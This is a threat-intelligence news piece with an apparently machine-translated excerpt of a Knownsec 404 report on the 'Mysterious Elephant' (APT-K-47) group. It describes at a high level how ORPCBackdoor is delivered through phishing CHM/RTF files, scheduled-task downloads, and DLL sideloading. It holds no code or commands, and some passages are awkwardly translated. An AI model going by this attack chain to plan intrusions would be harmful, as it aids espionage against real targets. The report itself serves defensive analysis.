For the past couple of years, the Asia-Pacific region has been a hotbed of cyberattacks from various intruders.
Among the many APT members active in the region, some of them are focused on Pakistani victims.
Recently, Kaspersky Lab researchers discovered a cluster of activity in this region, centered on a similar victim profile, to which two private TTP analysis reports have been devoted over the past few years, naming the attacker Mysterious Elephant.
Moreover, some of the Mysterious Elephant tools bear similarities to older tools that were previously used by other attackers in the region.
For example, earlier versions of the Rover backdoor were seen on SideWinder and Confucius.
One of the reports also analyzed a campaign targeting a number of victims in Pakistan.
The main malware in this campaign is a new family of backdoors that are dropped onto victims’ computers via an RTF document and CVE-2017-11882 downloaded via another phishing document.
The backdoor module communicates with its C2 server using remote procedure call (RPC) and has the ability to execute files or commands on the victim’s machine, as well as receive files or commands from the C2 server to be executed on the infected computer.
In turn, the Chinese infosec company KNOW Chuangyu came to the conclusion that the Mysterious Elephant described in the Kaspersky Lab report is none other than Bitter APT.
Chinese researchers got on its trail earlier this year through the analysis of a new backdoor called ORPCBackdoor .
After confirming their assumptions, Chuangyu believe that the backdoor discovered by the Lab is the same malware as ORPCBackdoor.
In their report, the Chinese researchers expanded their analysis of the overall chain of attacks, and also identified new victims outside of Pakistan based on telemetry, presenting details of attacks and ART-related IOCs in their article.
Original Paper | Demystifying South Asia’s New APT Organization APT-K-47 “Mysterious Elephant”
original 404 Advanced Threat Intelligence Seebug Vulnerability Platform 2023-08-04 05:07 Posted on Hubei
image
Author: K&NaN@知道创宇404 Advanced Threat Intelligence Team
Date: August 4, 2023
In March 2023, we know that Chuangyu 404 Advanced Threat Intelligence Team took the lead in capturing the weapon backdoor of a new APT organization in the world, which we call “ORPCBackdoor”, and released a detailed analysis of the weapon backdoor in May 2023: Bitter Organization New Attack Weapon Analysis Report-ORPCBackdoor Weapon Analysis
https://mp.weixin.qq.com/s/9cqXdFn7erJupk9QPRhqpg
In the report, we positioned the backdoor of this weapon as the latest weapon used by BITTER (“Man Linghua”). However, we noticed that Kaspersky recently released a report saying that they claimed to have discovered a brand new APT organization in the second quarter. , the main target of the organization is Pakistan, which is named “Mysterious Elephant (Mysterious Elephant)”. In addition, two non-public reports were released. The first report mainly described the main techniques and tactics (TTPS) of the organization in the past few years, and the second described the organization’s attacks on Pakistan’s foreign affairs-related departments.
The main feature of this group is the use of a brand new backdoor, which is delivered to the victim’s machine through a malicious RTF document. Malicious RTF documents are delivered via phishing emails.
This brand-new backdoor communicates with the C2 server through RPC, and has the ability to execute files or commands on the controlled machine. At the same time, the backdoor can also receive files and commands from the C2 server and execute them.
After confirmation, the backdoor discovered by Kaspersky is the same backdoor program as the “ORPCBackdoor” we first captured. Considering the differences in attribution, it is known that Chuangyu 404 Advanced Threat Intelligence Team has adopted a new number for the “new” organization using “ORPCBackdoor”: APT-K-47, Chinese name “Mysterious Elephant” .
In this article, we will further expand the analysis from the overall attack chain of the sample and the analysis of the homology relationship, and we have also observed through the big data of Chuangyu telemetry that the target of the organization’s attack is not only Pakistan, but also has traces of attacking other countries.
At the same time, after retrospective analysis, we found that the earliest attack activities of the organization should have started around March 2022. This article will publish the details of the attack by the APT organization and related IOCs.
https://mp.weixin.qq.com/s/9cqXdFn7erJupk9QPRhqpg
1. Overall attack chain
References
Imagefigure 1
In an attack of APT-K01, the attacker sent a CHM file to the target through phishing emails. The CHM file used “Russia-China Friendship, Peace and Development Committee” as a bait. The content of the bait is as follows.
Imagefigure 2
From the content of the phishing file, we can see that the attack target of the organization is not only Pakistan as described by Kaspersky, but according to the previous known Chuangyu telemetry big data, the attack target of the organization is multiple countries.
The malicious part of the CHM file is doc.html, and there is an OBJECT object in this file, which is used to create a scheduled task that runs every 15 minutes, and the task is used to download and execute the second-level malicious program stored in the second-level server , the second-order program is an MSI file.
imageimage 3
A pair of white and black files are stored in the second-stage MSI file. The black file is ORPCBackdoor mentioned in Kaspersky’s report, and the white file is Microsoft’s official service file, which is used to start the black file (OLMAPI32.dll).
2. Homology analysis
References
The ORPCBackdoor attack chain overlaps with the techniques and tactics used in the Indian direction. Among them, the techniques and tactics of the BITTER organization are very similar to the code structure. The relevant comparative analysis is as follows:
The CHM file structure used by the BITTER organization in previous attack activities is as follows:
imageFigure 5
The CHM file structure of the initial stage of ORPCBackdoor captured this time is as follows:
https://mp.weixin.qq.com/s/9cqXdFn7erJupk9QPRhqpg
